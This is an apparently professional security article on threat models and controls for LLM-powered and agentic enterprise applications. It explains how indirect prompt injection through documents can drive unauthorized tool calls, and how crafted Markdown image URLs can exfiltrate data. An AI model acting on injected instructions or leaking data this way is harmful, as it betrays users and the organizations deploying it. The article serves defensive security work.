Securing the LLM Supply Chain: Threat Models for AI-Powered Apps

Most enterprise application security programs were designed for deterministic systems. LLM-powered applications break enough of those assumptions that a meaningful share of their attack surface goes uncovered by existing controls. The gap is widening as agentic patterns add tool-calling and external action capabilities to what used to be read-only chat interfaces.

The pace of deployment has outrun the pace of control maturity. Gartner's 2024 board survey found that 55% of organizations are piloting or in production with generative AI, while internal security review processes for AI features in our client base typically lag the first production deployment by one to two quarters. The result is a meaningful population of LLM features running in production without a documented threat model, an explicit privilege boundary, or LLM-specific monitoring. In our work across financial services, healthcare, and SaaS engagements, this gap is the single most common finding.

What is new in the threat model

Five categories of risk are either new or substantially amplified in LLM-powered applications. The OWASP Top 10 for LLM Applications provides a useful taxonomy, but in practice the categories below carry the most weight in real incidents:

Prompt injection (direct and indirect). Direct prompt injection is widely understood. The harder variant is indirect: malicious instructions embedded in documents, web pages, or emails that the LLM later processes. Any system that ingests untrusted text and acts on it must assume that text contains hostile instructions. Greshake et al.'s 2023 paper demonstrated indirect injection attacks against Bing Chat and other production systems, and the attack class has since been reproduced against most major frontier-model deployments. No known general-purpose defense exists; mitigation is architectural.
Tool-calling and agent abuse. When the LLM can invoke tools (database queries, API calls, file system access), prompt injection becomes a code-execution primitive. The security boundary is no longer the model output; it is the privilege of the tool-calling agent. An agent with read-write access to a customer support ticketing system, for example, has the effective authority of a tier-one support engineer, and any document it processes is now an instruction channel.
Training data and weight provenance. Model weights, fine-tuning datasets, and embedding indexes are now part of the supply chain. Compromised weights can introduce backdoors that no application-layer test will find. SBOMs need an AI-BOM equivalent. NIST's AI Risk Management Framework treats data and model provenance as first-class supply-chain concerns; most enterprises we work with do not yet inventory their fine-tuning datasets at the level required to support an incident investigation.
Output exfiltration. Side-channel exfiltration via model outputs, including crafted Markdown image URLs, link previews, or steganographic patterns in generated text. The pattern of choice in published exploits is a Markdown image whose URL encodes data the attacker has tricked the model into reading; the user's browser silently fetches the image and the data leaves the perimeter. Especially relevant in agentic systems with network access, where the model can be induced to make outbound HTTP calls directly.
Model denial-of-wallet. Adversaries can drive cost rather than disrupt availability, by triggering long-context or expensive-tool invocations. With frontier-model context windows now reaching 1M tokens and per-million-token input pricing in the $3-15 range for top-tier models, a single abusive session can generate three- or four-figure costs in minutes. The economic attack is real and largely uncovered by traditional rate limiting, which counts requests rather than tokens or tool invocations.

The privilege boundary problem

The single most consequential design decision in an LLM-powered application is where the privilege boundary sits. In a chat assistant that only generates text, the boundary is at the output: the LLM can say anything, but only the user acts on its words. In an agentic system, the boundary moves to the tool layer: the LLM can act, and the tools' permissions become the effective security perimeter.

Most production incidents we have investigated trace back to a privilege boundary that was implicit rather than designed. The remediation is almost always the same: explicit allowlists for what tools can be invoked under what conditions, with the LLM treated as untrusted code rather than as part of the application logic. The mental model that works is the one Simon Willison has articulated repeatedly: the LLM is a confused deputy, and your architecture must assume any input it sees is potentially adversarial.

A counter-take worth stating plainly: we disagree with the prevailing vendor message that better models or stronger system prompts will close the prompt-injection gap. They will not. Empirical evaluations of injection defenses, including Anthropic's constitutional classifiers work and academic red-team studies, consistently show attack success rates that remain non-trivial even against the strongest production defenses. Treating the model itself as a security control is the wrong frame. The right frame is the one used for sandboxing untrusted code: assume compromise, contain blast radius, and design for failure. Teams that buy the vendor narrative ship agentic features with broad tool privileges and discover the limits of model-layer defenses in production.

Controls that work

The control set that materially reduces risk in LLM-powered applications:

Input segregation. Treat untrusted text as data, not instructions, by structurally separating it in the prompt and using model features (system prompts, tool result tagging, Anthropic's XML tag conventions) that allow the model to distinguish provenance. This is necessary but not sufficient; it raises the cost of injection without eliminating the class.
Output filtering and policy enforcement. Outputs that will be rendered in HTML, executed as code, or sent to external systems must pass the same kinds of checks you would apply to user-generated content from an anonymous source. For Markdown rendering specifically, strip or proxy image URLs and external links by default; the exfiltration vectors here are well-documented and easy to close.
Tool-level authorization. Each tool call is authorized on the user's behalf, not the model's. The LLM proposes; the application authorizes. High-impact tools (anything that writes, sends external communications, or moves money) should require an additional check, whether human-in-the-loop confirmation, a separate policy engine, or a non-LLM verification step. We have seen well-designed agentic systems where roughly 10-20% of tool calls are gated by an explicit human confirmation, and this is the right ballpark for production systems with real consequences.
Audit logging at the prompt and tool level. Every prompt, every tool invocation, every output should be loggable in a way that supports incident response. Most teams discover this requirement during their first incident, when they cannot reconstruct what the model was told or what it did. Retention policies should match the rest of the security event pipeline, not the shorter retention common for ML training logs.
Cost and rate limits at multiple layers. Per-user, per-session, per-tool, and per-model, with both request counts and token counts tracked separately. The economic attack surface is real and underweighted. Token-aware rate limiting catches abuse that request-count limiting misses entirely.
AI-BOM and model provenance tracking. Track which models, fine-tuning datasets, and embedding indexes are in use, where they came from, and when they last changed. The Coalition for Secure AI and similar industry efforts are converging on standards here; teams should not wait for the standards to harden before starting their inventory.

What to assess this quarter

Three exercises deliver outsized signal.

First, run a structured red-team exercise against your highest-stakes LLM application, focused on indirect prompt injection through real document inputs. The exercise should include the document types the system actually processes (PDFs from customers, scraped web pages, email attachments) rather than synthetic adversarial prompts. We typically scope these as two-week engagements with a defined success criterion: can the red team cause an unauthorized tool invocation or data egress through document-mediated injection? The pass rate on first attempts is low; in our experience fewer than one in three production systems pass without remediation.

Second, map the privilege boundary explicitly. Write down what the LLM can cause to happen without further human authorization. List every tool, every API the agent can reach, and every effect each can have. Verify the answer matches the design intent. This exercise alone surfaces the majority of architectural issues, because the gap between "what we built" and "what we thought we built" is consistently wider than teams expect.

Third, add LLM-specific signals to your SIEM: prompt anomalies, tool-call patterns, cost spikes per user and per session, and unusual output characteristics (unexpected URLs, base64 blobs, large data volumes in responses). Standard application signals will not catch the LLM-specific attack patterns; the detection content has to be built specifically.

For regulated industries, a fourth exercise: align the threat model documentation with the controls expected by your regulator. The EU AI Act brings concrete documentation requirements for high-risk AI systems, with the bulk of obligations applying from August 2026, and financial regulators including the OCC and FCA have issued guidance treating model risk management as applicable to LLM deployments. The compliance work is substantially easier when the threat model and control documentation already exist; retrofitting it under regulatory time pressure is consistently more expensive.

The bottom line

LLM-powered applications are not insecure by nature, but they are insecure by default for organizations that treat them as conventional web applications with a smarter backend. The threat model is genuinely different. The good news is that the controls that work are not exotic; they are application security fundamentals applied to a new privilege boundary.

The teams that get this right share a few habits. They treat the LLM as untrusted code from the day they write the design document. They invest in tool-layer authorization before they invest in prompt engineering. They build the audit and cost-monitoring infrastructure as part of the initial deployment, not after the first incident. And they take a clear position on what their agents can and cannot do without human authorization, rather than letting the boundary drift outward as new features ship.

The teams that get it wrong tend to share a different pattern: a belief that a sufficiently careful system prompt or a sufficiently capable model will handle the security problem. It will not. The supply chain for LLM-powered applications is wider than the model, includes data the application did not produce, and reaches into systems the security team has historically not had to reason about. Treating it as a supply-chain problem, with the inventory, provenance, and boundary discipline that implies, is the work that distinguishes production-grade AI applications from the prototypes that currently dominate the deployment base.

// Related

Continue reading

AI & INTELLIGENT AUTOMATION